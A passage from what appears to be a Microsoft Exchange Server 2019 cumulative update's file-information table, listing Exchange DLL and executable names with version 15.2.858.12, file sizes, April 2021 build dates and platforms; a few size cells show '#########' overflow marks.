\nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.2.858.12| 224,632| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.data.mapi.dll| 15.2.858.12| 186,760| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.2.858.12| 39,816| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.metering.dll| 15.2.858.12| 119,176| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.2.858.12| 968,080| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.notification.dll| 15.2.858.12| 141,176| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.2.858.12| 769,400| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.data.providers.dll| 15.2.858.12| 139,656| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.2.858.12| 56,712| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.2.858.12| 453,000| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.2.858.12| 32,632| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.2.858.12| 256,888| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.storage.dll| 15.2.858.12| #########| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.2.858.12| 37,752| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.2.858.12| 655,752| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.2.858.12| 175,488| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.2.858.12| 36,232| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.858.12| 14,224| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.2.858.12| 14,224| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.858.12| 14,712| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.2.858.12| 72,568| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.2.858.12| 13,200| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.2.858.12| 22,928| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.diagnostics.dll| 15.2.858.12| 2,213,240| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.2.858.12| 2,213,240| 27-Apr-21| 13:23| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.2.858.12| 23,944| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.2.858.12| 546,696| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.2.858.12| 215,440| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.858.12| 194,424| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.2.858.12| 146,320| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.858.12| 27,528| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.858.12| 13,712| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.858.12| 49,552| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.2.858.12| 28,040| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.2.858.12| 208,760| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.2.858.12| 88,976| 27-Apr-21| 13:29| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.2.858.12| 32,648| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.2.858.12| 45,944| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.2.858.12| 18,808| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.dxstore.dll| 15.2.858.12| 473,488| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.2.858.12| 206,200| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.2.858.12| 36,744| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.2.858.12| 131,448| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.2.858.12| 21,904| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.2.858.12| 148,344| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.2.858.12| 220,024| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.2.858.12| 23,944| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.2.858.12| 97,680| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.858.12| 1,266,056| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.858.12| 1,266,056| 27-Apr-21| 13:25| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,519| 27-Apr-21| 13:27| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.858.12| 87,440| 27-Apr-21| 13:25| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,485| 27-Apr-21| 13:25| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.858.12| 52,088| 27-Apr-21| 13:27| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.858.12| 291,720| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.858.12| 73,080| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.858.12| 45,944| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.858.12| 218,512| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.858.12| 78,208| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.858.12| 35,720| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.858.12| 934,792| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.858.12| 336,248| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.858.12| 52,624| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.858.12| 32,144| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.858.12| 60,792| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.858.12| 854,400| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.858.12| 291,720| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.2.858.12| 39,312| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.858.12| 76,168| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.858.12| 166,776| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.858.12| 1,486,736| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.858.12| 122,256| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.858.12| #########| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.858.12| 264,072| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.858.12| 37,752| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.858.12| 186,760| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.858.12| 64,400| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.858.12| 83,856| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.858.12| 63,880| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.858.12| 100,232| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.858.12| 144,776| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.858.12| 270,216| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.858.12| 15,248| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.858.12| 15,760| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.858.12| 130,424| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.858.12| 254,344| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.858.12| 13,176| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.858.12| 37,240| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.2.858.12| 640,888| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.858.12| 37,240| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.858.12| 146,312| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.858.12| 13,192| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.858.12| 596,368| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.858.12| 14,728| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.858.12| 30,096| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.858.12| 99,704| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.858.12| 42,360| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.858.12| 40,336| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.858.12| 54,160| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.858.12| 164,240| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.858.12| 58,760| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.858.12| 204,168| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.858.12| 17,784| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.858.12| 30,608| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.858.12| 38,776| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.858.12| 48,528| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.858.12| 180,624| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.858.12| 36,736| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.858.12| 26,000| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.858.12| 1,868,160| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.858.12| 54,656| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.858.12| 35,728| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.858.12| 35,728| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.858.12| 18,312| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.858.12| 18,312| 27-Apr-21| 13:24| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.858.12| 263,048| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.858.12| 263,048| 27-Apr-21| 13:24| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.858.12| 24,952| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.858.12| 24,952| 27-Apr-21| 13:24| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.858.12| 53,136| 27-Apr-21| 13:23| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.858.12| 216,952| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.858.12| 32,144| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.858.12| 281,976| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.858.12| 18,808| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.858.12| 83,856| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.858.12| 15,248| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.858.12| 94,072| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.858.12| 1,840,512| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.858.12| 71,544| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.858.12| 175,496| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.858.12| 45,960| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.2.858.12| 159,608| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.858.12| 51,064| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.858.12| 45,968| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.858.12| 32,120| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.858.12| 100,216| 27-Apr-21| 13:29| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.858.12| 13,200| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.858.12| 271,224| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.858.12| 22,416| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.858.12| 33,680| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.2.858.12| 18,296| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.858.12| 27,512| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.858.12| 30,584| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.858.12| 22,392| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.858.12| 66,424| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.858.12| 29,576| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.858.12| 19,832| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.858.12| 20,344| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.858.12| 19,320| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.858.12| 34,192| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.858.12| 103,824| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.858.12| 31,608| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.858.12| 15,736| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.858.12| 20,856| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.858.12| 16,272| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.858.12| 49,016| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.858.12| 44,408| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.858.12| 38,264| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.858.12| #########| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.858.12| 29,048| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.858.12| 21,392| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.858.12| 24,456| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.858.12| 21,904| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.858.12| 89,472| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.858.12| 20,872| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.858.12| 26,512| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.858.12| 21,392| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.858.12| 28,040| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.858.12| 28,560| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.858.12| 36,240| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.858.12| 16,776| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.858.12| 19,832| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.858.12| 17,296| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.858.12| 19,848| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.858.12| 57,224| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.858.12| 17,792| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.858.12| 18,824| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.858.12| 16,272| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.858.12| 17,800| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.858.12| 15,248| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.858.12| 52,616| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.858.12| 18,320| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.858.12| 34,184| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.858.12| 17,288| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.858.12| 18,824| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.858.12| 43,384| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.loguploader.dll| 15.2.858.12| 165,256| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.858.12| 54,672| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.858.12| 9,057,144| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.858.12| 33,168| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.858.12| 124,296| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.858.12| 82,832| 27-Apr-21| 13:27| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.858.12| 14,224| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.858.12| 30,096| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.858.12| 661,384| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.858.12| 63,352| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.858.12| 175,480| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.858.12| 2,791,800| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.858.12| 53,112| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.858.12| 151,928| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.858.12| 966,536| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.858.12| 185,208| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.858.12| 31,608| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.858.12| 39,824| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.858.12| 105,848| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.858.12| 95,096| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.858.12| 43,384| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.858.12| 18,808| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.858.12| 172,920| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.858.12| 102,776| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.858.12| 98,680| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.858.12| 188,792| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.858.12| 43,408| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.858.12| 447,368| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.858.12| 90,000| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.858.12| 107,920| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.858.12| 371,080| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.858.12| 193,928| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.858.12| 552,328| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.858.12| 16,256| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.858.12| 15,760| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.858.12| 321,400| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.858.12| 17,808| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.858.12| 45,456| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.858.12| 18,296| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.858.12| 20,880| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.858.12| 415,104| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.858.12| 1,269,648| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.858.12| 39,304| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.858.12| 433,528| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.858.12| 4,566,392| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.858.12| 260,984| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.858.12| 33,656| 27-Apr-21| 13:23| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.858.12| 94,080| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.858.12| 586,128| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.858.12| 3,543,432| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.858.12| 67,960| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.management.dll| 15.2.858.12| #########| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.858.12| 58,768| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.858.12| 23,944| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.858.12| 101,768| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.858.12| 544,120| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.858.12| 305,016| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.858.12| 273,800| 27-Apr-21| 13:29| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.858.12| 418,704| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.858.12| 275,856| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.858.12| 70,536| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.858.12| 